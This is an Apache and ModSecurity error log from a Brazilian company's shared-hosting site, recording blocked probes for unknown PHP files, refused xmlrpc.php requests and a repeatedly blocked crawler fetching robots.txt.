[Mon Mar 16 05:08:09.714118 2026] [access_compat:error] [pid 10709:tid 140411548894976] [client 20.203.144.43:50800] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/no1.php
[Mon Mar 16 05:08:10.218859 2026] [access_compat:error] [pid 11972:tid 140411708356352] [client 20.203.144.43:50818] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/teee.php
[Mon Mar 16 05:08:10.414801 2026] [access_compat:error] [pid 32654:tid 140411649607424] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wo.php
[Mon Mar 16 05:08:10.609780 2026] [access_compat:error] [pid 32654:tid 140411599251200] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/rithin.php
[Mon Mar 16 05:08:10.804876 2026] [access_compat:error] [pid 32654:tid 140411708356352] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/kk.php
[Mon Mar 16 05:08:10.999895 2026] [access_compat:error] [pid 32654:tid 140411699963648] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/path.php
[Mon Mar 16 05:08:11.198640 2026] [access_compat:error] [pid 32654:tid 140411624429312] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/cs.php
[Mon Mar 16 05:08:11.402470 2026] [access_compat:error] [pid 32654:tid 140411666392832] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/w2025.php
[Mon Mar 16 05:08:11.599534 2026] [access_compat:error] [pid 32654:tid 140411725141760] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/swallowable.php
[Mon Mar 16 05:08:11.799575 2026] [access_compat:error] [pid 32654:tid 140411557287680] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/fvvff.php
[Mon Mar 16 05:08:11.994124 2026] [access_compat:error] [pid 32654:tid 140411691570944] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/a2.php
[Mon Mar 16 05:08:12.198617 2026] [access_compat:error] [pid 32654:tid 140411565680384] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sty.php
[Mon Mar 16 05:08:12.396467 2026] [access_compat:error] [pid 32654:tid 140411574073088] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/g.php
[Mon Mar 16 05:08:12.595895 2026] [access_compat:error] [pid 32654:tid 140411641214720] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pp.php
[Mon Mar 16 05:08:12.794926 2026] [access_compat:error] [pid 32654:tid 140411716749056] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sys.php
[Mon Mar 16 05:08:12.992068 2026] [access_compat:error] [pid 32654:tid 140411582465792] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/txets.php
[Mon Mar 16 05:08:13.188751 2026] [access_compat:error] [pid 32654:tid 140411616036608] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp9.php
[Mon Mar 16 05:08:13.389232 2026] [access_compat:error] [pid 32654:tid 140411658000128] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/path.php
[Mon Mar 16 05:08:13.589579 2026] [access_compat:error] [pid 32654:tid 140411590858496] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wdf.php
[Mon Mar 16 05:08:13.786639 2026] [access_compat:error] [pid 32654:tid 140411540502272] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/2.php
[Mon Mar 16 05:08:13.987104 2026] [access_compat:error] [pid 32654:tid 140411607643904] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wsvvs.php
[Mon Mar 16 05:08:14.180939 2026] [access_compat:error] [pid 32654:tid 140411674785536] [client 20.203.144.43:50820] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/3.php
[Mon Mar 16 05:12:20.977499 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.228.16:60916] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe7ZNSswJuvopo3lOg89AAAAIY"]
[Mon Mar 16 05:12:28.838045 2026] [access_compat:error] [pid 21805:tid 140411565680384] [client 45.3.49.177:50249] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 05:12:29.792305 2026] [access_compat:error] [pid 11972:tid 140411582465792] [client 45.3.49.177:63843] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 05:12:30.798620 2026] [access_compat:error] [pid 10831:tid 140411699963648] [client 45.3.49.177:50063] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 05:12:38.255629 2026] [access_compat:error] [pid 21533:tid 140411616036608] [client 209.50.160.105:18677] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 05:12:39.234739 2026] [access_compat:error] [pid 21533:tid 140411557287680] [client 209.50.160.105:60307] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 05:12:40.222165 2026] [access_compat:error] [pid 32654:tid 140411691570944] [client 209.50.160.105:16819] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 05:13:42.706311 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.244.31:60046] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe7tglT9VtDQc7bgUx7ogAAAQc"]
[Mon Mar 16 05:15:50.465890 2026] [access_compat:error] [pid 10709:tid 140411557287680] [client 193.233.126.116:59586] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 05:17:37.956073 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.228.16:42748] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe8of9ocpUE4ed4uDzKTAAAAhE"]
[Mon Mar 16 05:18:57.760733 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.244.31:52564] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe88dSswJuvopo3lOg9GAAAAJY"]
[Mon Mar 16 05:22:47.551221 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.228.16:57374] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe919SswJuvopo3lOg9LwAAAIY"]
[Mon Mar 16 05:24:19.994603 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.244.31:38018] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe-M7ABkC4fWIHEf8HF9gAAAEY"]
[Mon Mar 16 05:28:07.926774 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.228.16:32966] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe_F5qj1wV0Si-OkefEzQAAABc"]
[Mon Mar 16 05:29:21.516407 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.244.31:59364] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe_Yf9ocpUE4ed4uDzK0AAAAgA"]
[Mon Mar 16 05:33:11.083558 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.228.16:40682] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfAR46lpbStxTqkSktHbgAAAkk"]
[Mon Mar 16 05:34:06.117116 2026] [access_compat:error] [pid 21805:tid 140411733534464] [client 185.196.111.169:11272] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 05:38:35.869853 2026] [:error] [pid 21946:tid 140411683178240] [client 74.7.228.16:47302] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfBi3bQATo66fKoS7wmXwAAAMc"]
[Mon Mar 16 05:39:47.980914 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.244.31:52452] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfB046lpbStxTqkSktHmwAAAkM"]
[Mon Mar 16 05:43:39.740233 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.228.16:45092] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfCu7ABkC4fWIHEf8HHNwAAAFU"]
[Mon Mar 16 05:45:10.723019 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.244.31:44246] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfDFo6lpbStxTqkSktIRAAAAks"]
[Mon Mar 16 05:48:55.048638 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.228.16:43108] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfD946lpbStxTqkSktIXwAAAkw"]
[Mon Mar 16 05:50:12.004563 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.244.31:46880] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfERLABkC4fWIHEf8HHdAAAAEM"]
[Mon Mar 16 05:53:27.286190 2026] [access_compat:error] [pid 21533:tid 140411607643904] [client 203.100.215.216:53396] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 05:53:59.986205 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.228.16:51342] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfFJ_9ocpUE4ed4uDzLjAAAAgk"]
[Mon Mar 16 05:55:27.340024 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.244.31:49284] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfFf7ABkC4fWIHEf8HHnQAAAFQ"]
[Mon Mar 16 05:59:25.379779 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.228.16:48692] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfGbXbQATo66fKoS7wnIgAAAMU"]
[Mon Mar 16 06:00:33.325025 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.244.31:44022] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfGsbABkC4fWIHEf8HHxAAAAE8"]
[Mon Mar 16 06:05:54.930494 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.244.31:56970] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfH8tSswJuvopo3lOg-pwAAAIA"]
[Mon Mar 16 06:14:59.644402 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.228.16:33738] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfKE46lpbStxTqkSktJfwAAAlM"]
[Mon Mar 16 06:16:26.666331 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.244.31:41220] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfKaglT9VtDQc7bgUyDXAAAARQ"]
[Mon Mar 16 06:20:25.917008 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.228.16:39648] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfLWXbQATo66fKoS7woCwAAANU"]
[Mon Mar 16 06:21:32.295532 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.244.31:33024] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfLnNSswJuvopo3lOg_CgAAAIs"]
[Mon Mar 16 06:25:32.540208 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.228.16:59732] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfMjJqj1wV0Si-OkefHvQAAAAU"]
[Mon Mar 16 06:26:57.754505 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.244.31:34448] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfM4XbQATo66fKoS7wo6QAAAMs"]
[Mon Mar 16 06:30:58.011624 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.228.16:46334] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfN0RXjF1vJNtV6CWrY7QAAAco"]
[Mon Mar 16 06:32:03.138049 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.244.31:36472] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfOE3jZBu2q05ozVU8zlAAAAVY"]
[Mon Mar 16 06:36:05.245320 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.228.16:38552] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfPBbysWC90G-1nBrAkQwAAAY8"]
[Mon Mar 16 06:39:45.211508 2026] [access_compat:error] [pid 21806:tid 140411582465792] [client 170.168.99.127:17437] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:39:46.435650 2026] [access_compat:error] [pid 10831:tid 140411616036608] [client 193.203.9.125:39645] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:39:47.851732 2026] [access_compat:error] [pid 10772:tid 140411733534464] [client 193.202.83.82:16155] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:39:49.600485 2026] [access_compat:error] [pid 21533:tid 140411632822016] [client 185.168.29.109:52169] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:39:51.111464 2026] [access_compat:error] [pid 21806:tid 140411616036608] [client 170.168.96.71:40903] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:39:52.792767 2026] [access_compat:error] [pid 10772:tid 140411590858496] [client 45.159.21.229:41819] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:39:54.310666 2026] [access_compat:error] [pid 10651:tid 140411733534464] [client 83.97.117.172:29645] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:39:55.855934 2026] [access_compat:error] [pid 21946:tid 140411699963648] [client 185.61.222.241:12971] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:39:57.335639 2026] [access_compat:error] [pid 10709:tid 140411699963648] [client 212.119.47.95:20431] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:39:58.437904 2026] [access_compat:error] [pid 11972:tid 140411674785536] [client 170.168.96.198:36041] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:40:01.983812 2026] [access_compat:error] [pid 32654:tid 140411699963648] [client 170.168.99.154:62895] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 06:41:29.027010 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.228.16:37054] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfQSZqj1wV0Si-OkefIogAAAAk"]
[Mon Mar 16 06:42:32.277113 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.244.31:53718] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfQiNSswJuvopo3lOhASQAAAIE"]
[Mon Mar 16 06:46:30.715334 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.228.16:39402] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfRdpqj1wV0Si-OkefI9AAAAAY"]
[Mon Mar 16 06:47:57.971695 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.244.31:34614] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfRzXjZBu2q05ozVU80egAAAVg"]
[Mon Mar 16 06:51:47.594265 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.228.16:39038] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfSs5qj1wV0Si-OkefJFwAAABc"]
[Mon Mar 16 06:53:10.025465 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.244.31:56252] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfTBtSswJuvopo3lOhA7QAAAJY"]
[Mon Mar 16 06:57:00.018080 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.228.16:33606] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfT69SswJuvopo3lOhBDQAAAJI"]
[Mon Mar 16 06:58:34.791282 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.244.31:37818] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfUStSswJuvopo3lOhBGAAAAJY"]
[Mon Mar 16 07:02:22.122230 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.228.16:42780] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfVLo6lpbStxTqkSktMnAAAAlM"]
[Mon Mar 16 07:03:44.550312 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.244.31:57348] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfVgHjZBu2q05ozVU81egAAAVI"]
